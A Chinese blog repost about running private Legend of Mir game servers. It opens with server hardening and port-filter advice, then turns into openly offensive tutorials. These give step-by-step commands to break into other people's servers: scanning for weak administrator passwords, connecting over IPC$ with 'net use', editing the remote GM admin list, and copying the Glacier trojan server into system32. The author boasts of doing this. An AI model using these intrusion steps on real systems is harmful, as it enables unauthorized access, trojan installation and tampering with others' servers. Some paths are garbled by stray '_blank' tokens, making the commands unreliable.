8.禁止从软盘和CD Rom启动系统
  一些第三方的工具能通过引导系统来绕过原有的安全机制。如果你的服务器对安全要求非常高,可以考虑使用可移动软盘和光驱。把机箱锁起来扔不失为一个好方法。    
  9.考虑使用智能卡来代替密码
  对于密码,总是使安全管理员进退两难,容易受到 10phtcrack 等工具的攻击,如果密码太复杂,用户把为了记住密码,会把密码到处乱写。如果条件允许,用智能卡来代替复杂的密码是一个很好的解决方法。    
  10.考虑使用IPSec
  正如其名字的含义,IPSec 提供 IP 数据包的安全性。IPSec 提供身份验证、完整性和可选择的机密性。发送方计算机在传输之前加密数据,而接收方计算机在收到数据之后解密数据。利用IPSec可以使得系统的安全性能大大增强。   
SF的必须开放端口,极其解决端口安全的方法
  传奇服务器开放端口+花生壳+一些必须端口
  可以将这些端口使用TCP/IP筛选,只开放这些端口增加安全性,(开设其他服务,端口自己再加入)
  TCP/IP筛选端口-> TCP断口
  端口7220 .... RunGate 1 端口
  端口7210 .... RunGate 2 端口 同时开启3个RunGate
  端口7200 .... RunGate 3 端口
  端口7100
  端口7012
  端口6000
  端口5600
  端口5500
  端口5100
  端口5000
  端口4900
  端口3389
  端口3372
  端口3100
  端口3000
  端口1027
  端口1025
  端口0135   
  system32driversetcservices 文件中有知名端口和服务的对照表可供参考。具体方法为:
  网上邻居>属性>本地连接>属性>internet 协议(tcp/ip)>属性>高级>选项>tcp/ip筛选>属性 打开tcp/ip筛选,添加需要的tcp,协议即可。    
  我开了3个RunGate端口,解决多个玩家同时登陆访问时会出现7200错误而使服务器突然狂卡,开3个效果比较好。是*(ggggg7原创)
  开3个RunGate端口的方法:
  RunGate文件夹再复制2份 分别为RunGate1,RunGate2,RunGate3 将里面的Mirgate.ini分别改为GatePort=7200,GatePort=7210,GatePort=7220    
  DBSrv200文件夹下的!serverinfo.txt改为127.0.0.1 127.0.0.1 7200 127.0.0.1 7210 127.0.0.1 7220  
 
  Mir200文件夹下的!servertable.txt改为
  1 127.0.0.1 7200
  2 127.0.0.1 7210
  3 127.0.0.1 7220
  
  然后运行RunGate1,RunGate2,RunGate3 下的3个RunGate.exe
  
  M2Server会提示:
  Gate 0 opened
  Gate 1 opened
  Gate 2 opened
  适当的加点_blank">防火墙会更好
私服的攻与防
  本人崇尚私服技术!热情钻研私服!为营造一个好的游戏氛围而共同努力过!
  前几*,本私服也同样遭受过黑客的攻击!但是研究了几次发现了漏洞的所在!
  下面我先写如何入侵计算机的,我用的是WINDOWS 2000 SEVER
  1 X-SCAN扫描IP 看看谁是弱口令(IP也非常容易得到,私服都有,弱口令就是用户名和密码都是系统默认的,没有改。)
  2 打开DOS系统 在DOS下进行*作!
  c:/>net use _blank>192.168.0.1ipc$ /user:administrator 进入对方计算机USER进入的就是管理员用户。
  进入了以后就好办了,可以找你要黑的私服!做GM也好,搞破坏删除也好,比如做GM吧!
  c:/>copy _blank>192.168.0.1d$mirservermir200enviradminlist.txt 都是命令,可以看出来,其余的想怎么改就凭你了,但是我得解释一下!!这段代码目的很简单就是将D盘拷贝一个传奇GM的列表,你可以把你自己添加进去在编辑!
  c:>edit _blank>192.168.0.1d$mirservermir200enviradminlist.txt
  这样就可以了。这是利用弱口令进入计算机的方法!!当然了还有更多的方法。
  我在讲讲我的 ** 传奇的遭黑的经历!
  首先,就是鼠标乱动,很明显就是被人控制了,分析如下:1,中木马,2远程控制!
  其次,有文件覆盖的对话框,计算机被突然重新启动!!分析如下:1,破坏系统,2,对传奇的控制!3,从新启动是为了黑客的设置生效!
  再次,有非法GM制造物品,以被查出。分析如下:是针对传奇而来!
  解决办法:用杀毒软件杀毒,最好在DOS下进行!2,是2000的漏洞太多,查找无用的端口,并关闭3389等,下载 2000 SP3 的补丁!在控制面板中选本地用户和组中关闭GUEST帐号!和 IUSR (计算机名)INTNERNET来宾帐号关闭(我的传奇就是黑客利用这个号进入计算机的),修改超级管理员用户名与密码!在关闭远程访问等功能,另外,进攻传奇主要是GM列表,我同样也中过,现象是这样的,打开AdminList.txt文件,没有发现多的GM,利用 CTRL-A看看有没有多余的GM,另外仔细一看,在看AdminList.TXT的文件名后面有没有空格,设置文件全部显示,会发现是否多了一个隐藏 GM列表文件,这也是屡进不止的发现有非法GM的原因.黑客进攻我的计算机是用了2个小时就被我发现了,立即做了相应的修改,恢复了传奇的正常运行,至今为止,仍然有人进入我的来宾帐号的警告,但是已经进不来了!传奇也步入了正常的运行当中!
  虽然我写了一些如何进攻和防御计算机的方法和解决办法,我自己也觉得有点自相矛盾的想法,但是我的目的很是简单,希望能够帮助你解决你的问题!提高自己计算机的安全
   

  如何在别人的私服做GM????
 攻击初级教学
  我在侵入别人4f所使用的方法    
  看到有些4f做的不错,但是进去又不是很有钱,也没装备,高手也很多,一直不喜欢在里面当菜鸟的我,一口气进入他们的服务器端大闹一番之后。当足了gm的瘾,现在我把方法公布与大家。。。。
 
  其实我所使用的方法很简单,只有4个工具:
 
  (一):shed.exe    
  (二)流光2000    
  (三)cmd.exe (其实就是2000下的dos啦)!
 
  (四)冰河8.4 操作系统:win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.呵呵!一些作网站,网吧的服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,所以权限不够!有些需要密码。遇到密码怎办?用流光! “流光”虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,呵呵,你就可以抓到了。
 
  下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! “冰河”,想必许多朋友都玩过,使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? “cmd.exe” 是2000下的dos了,执行cmd.exe 使用net命令,    
  具体操作如下:  
  第一步:net use _blank>ipipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use _blank>210.248.250.2ipc$ “maozhiie” /user:maozhijie    
  第二步:copy g-server.exe _blank>ipadmin$system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧,呵呵!装了_blank">防火墙估计可以,不过很多主机没钱买呀!不像中国盗版满天飞!如果你有最新的木马也可以的!这是最好的了!!嘿嘿……



原创文章如转载,请注明:转载自郑州网站优化,seo推广方案策划培训-翼虎seo学习博客
原文地址:http://www.qihow.com/blog/wangluo/16.html